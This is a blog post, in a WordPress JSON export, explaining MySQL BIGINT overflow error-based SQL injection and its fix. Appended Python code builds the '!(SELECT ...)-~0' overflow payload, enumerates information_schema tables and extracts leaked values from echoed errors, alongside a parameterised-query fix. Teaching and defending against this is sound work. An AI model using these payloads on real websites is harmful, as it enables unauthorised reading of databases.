{"id":199,"date":"2016-02-14T00:54:08","date_gmt":"2016-02-14T00:54:08","guid":{"rendered":"http:\/\/chewett.co.uk\/?p=199"},"modified":"2019-01-20T23:42:05","modified_gmt":"2019-01-20T23:42:05","slug":"bigint-overflow-error-based-sql-injection","status":"publish","type":"post","link":"https:\/\/chewett.co.uk\/blog\/199\/bigint-overflow-error-based-sql-injection\/","title":{"rendered":"BIGINT Overflow Error Based SQL Injection"},"content":{"rendered":"<p>In MySQL 5.5 and later, BIGINT arithmetic that overflows raises an error instead of silently wrapping around. Combined with a site that builds SQL from unsanitized input and echoes the database error back to the user, that error becomes a channel for reading arbitrary data out of the database.<\/p>\n<h2>The problem of integer rollover<\/h2>\n<p>Integer rollover (overflow) happens when the result of an arithmetic operation is larger or smaller than the fixed number of bits used to store it can represent.<\/p>\n<p>In the case where the number is the highest possible stored value, adding to it wraps it around to the lowest possible value. Similarly, when the number is the lowest possible stored value, subtracting from it wraps it around to the highest.<\/p>\n<p>This is down to how the number is represented in binary: the carry out of the top bit is simply discarded, so the value &#8220;rolls over&#8221;. This is almost never the behaviour the programmer intended, yet in many languages it happens silently. Previously this was something you had to check for manually; newer languages and libraries are starting to detect it and raise an error instead.<\/p>\n<h2>How MySQL is affected by this<\/h2>\n<p>In MySQL versions 5.5 or later, instead of silently wrapping around, integer arithmetic that leaves the BIGINT range makes the statement fail with an out-of-range error. This is better than silently making your number radically different.<\/p>\n<p>The catch is what the error message contains. MySQL reports the expression that overflowed, and when a subquery inside that expression has already been evaluated to a single value, that value is printed as part of the expression. If the website displays the MySQL error directly, it therefore reports back the result of the subquery that caused the overflow. If a site does this and also allows unsanitized input to be sent to the database, an attacker can craft the query and read the results straight off the error page.<\/p>\n<p>By wrapping a subquery in an expression that always overflows, the attacker pulls one value per request out of any table in the database. Worse, the same trick works against information_schema, so table and column names do not have to be guessed: they can be read out first and the real data afterwards. Having full read access to the database can mean that sensitive information can be downloaded.<\/p>\n<h2>Fixing this exploit<\/h2>\n<p>The exploit is stopped at the root by never interpolating user input into SQL: bind it as a query parameter (a prepared statement), or failing that escape it correctly for its context, which is something many websites still forget to do. Numeric parameters are the classic gap, because they are often pasted into the query without quotes and so never pass through string escaping at all. Since this technique relies on viewing the data in the returned error, turning off error display also closes this particular leak, but it does not remove the injection: the subquery still executes, values can still be extracted blind, and data can still be inserted through the same hole. Even in the case that the error is not shown back, being able to insert data may allow privilege escalation.<\/p>\n<p>The full exploit, including example code and the full explanation, is <a href=\"https:\/\/www.exploit-db.com\/docs\/37733.pdf\" target=\"_blank\">available online<\/a>. This is another example of why it is critically important to sanitize input from users.<\/p>\n","protected":false},"excerpt":{"rendered":"<p>In MySQL 5.5 and later, BIGINT arithmetic that overflows raises an error instead of silently wrapping around. Combined with a site that builds SQL from unsanitized input and echoes the database error back to the user, that error becomes a channel for reading arbitrary data out of the database. The problem of integer rollover Integer rollover (overflow) happens when the result of an arithmetic operation is larger or smaller than the fixed number of bits used to store it can represent. 
In the case where the number is the highest [&hellip;]<\/p>\n","protected":false},"author":1,"featured_media":0,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","categories":[5],"tags":[95,60,96],"class_list":["post-199","post","type-post","status-publish","format-standard","hentry","category-informational","tag-exploit","tag-mysql","tag-sql"]}
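The post describes the technique and the fix in prose only. The following is an added example, not code from the original post or from the linked exploit-db paper, that walks through the whole chain: the broken query construction, the overflow payload shape the paper documents (!(SELECT ...)-~0), harvesting the leaked value from an echoed MySQL error, the information_schema walk that removes the need to guess table names, and the parameterised query that fixes it. The table and column names (users, id, name) are made up; SAMPLE_ERROR is a constructed string in the format MySQL 5.5+ prints for this payload (the exact quoting varies by version, so treat the regex as a starting point); sqlite3 stands in for the parameterised call only to show that the payload is handled as inert data, it does not reproduce MySQL's overflow error, and nothing here connects to a MySQL server.

```python
"""Added example: not code from the original post or the linked paper.

Demonstrates what the post describes, end to end:
  1. the broken pattern (a numeric id concatenated into SQL),
  2. the overflow payload shape from the linked exploit-db paper,
     !(SELECT ...)-~0, and why it always errors on MySQL 5.5+,
  3. harvesting the leaked value from an echoed MySQL error,
  4. walking information_schema so nothing has to be guessed,
  5. the fix: binding the value as a parameter.

Assumptions: table/column names (users, id, name) are made up;
SAMPLE_ERROR is a constructed string in the format MySQL prints for this
payload (exact quoting varies by version); sqlite3 stands in for the
parameterised call only to show the payload is inert data, it does not
reproduce MySQL's overflow error. Nothing here connects to MySQL.
"""
import re
import sqlite3
from typing import Iterator, List, Optional


def build_query_vulnerable(user_id: str) -> str:
    """The broken pattern. The id is pasted in unquoted, so even a site that
    escapes strings would never have touched it."""
    return "SELECT name FROM users WHERE id = " + user_id


def overflow_payload(scalar_expr: str) -> str:
    """Wrap an attacker-chosen scalar expression (user(), version(), a
    single-value subquery) in arithmetic that always overflows.

    ~0 is 18446744073709551615 (max BIGINT UNSIGNED); !(expr) is 0 or 1;
    so !(expr) - ~0 is negative and out of range. MySQL 5.5+ aborts the
    statement and prints the offending expression, with the already
    evaluated subquery result inside it."""
    return "1 AND !(SELECT * FROM (SELECT " + scalar_expr + ") AS x) - ~0"


def information_schema_payloads(max_tables: int) -> Iterator[str]:
    """One request per table name: LIMIT n,1 walks information_schema in
    the current database. The same idea enumerates columns and rows."""
    for n in range(max_tables):
        yield overflow_payload(
            "(SELECT table_name FROM information_schema.tables "
            f"WHERE table_schema = database() LIMIT {n},1)"
        )


# Constructed sample of what a page that echoes the raw MySQL error shows
# after overflow_payload("user()") is injected. The quoted subquery result
# inside the printed expression is the leak.
SAMPLE_ERROR = (
    "ERROR 1690 (22003): BIGINT UNSIGNED value is out of range in "
    "'((not((select 'root@localhost' from dual))) - ~(0))'"
)

# MySQL prints an evaluated string-valued scalar subquery as
# (select '<value>' from dual); values containing quotes are not handled.
LEAK_RE = re.compile(r"\(select '([^']*)' from dual\)")


def extract_leaked_value(error_text: str) -> Optional[str]:
    """Pull the subquery result back out of the echoed error, or None if the
    page did not leak one (error display off, or no overflow triggered)."""
    m = LEAK_RE.search(error_text)
    return m.group(1) if m else None


def demo_conn() -> sqlite3.Connection:
    """In-memory stand-in database with one constructed row."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE users (id INTEGER PRIMARY KEY, name TEXT)")
    conn.execute("INSERT INTO users VALUES (1, 'alice')")
    return conn


def lookup_name_safe(conn: sqlite3.Connection, user_id: str) -> List[str]:
    """The fix. The driver sends the value separately from the SQL text, so
    the payload is compared as one literal and never becomes syntax."""
    cur = conn.execute("SELECT name FROM users WHERE id = ?", (user_id,))
    return [row[0] for row in cur.fetchall()]


if __name__ == "__main__":
    print(build_query_vulnerable(overflow_payload("user()")))
    print(extract_leaked_value(SAMPLE_ERROR))
    for p in information_schema_payloads(2):
        print(build_query_vulnerable(p))
    conn = demo_conn()
    print(lookup_name_safe(conn, "1"))
    print(lookup_name_safe(conn, overflow_payload("user()")))
```

Switching error display off only empties what extract_leaked_value sees; the query built by build_query_vulnerable still runs the attacker's subquery, which is why the post treats hiding errors as a mitigation and parameter binding as the fix.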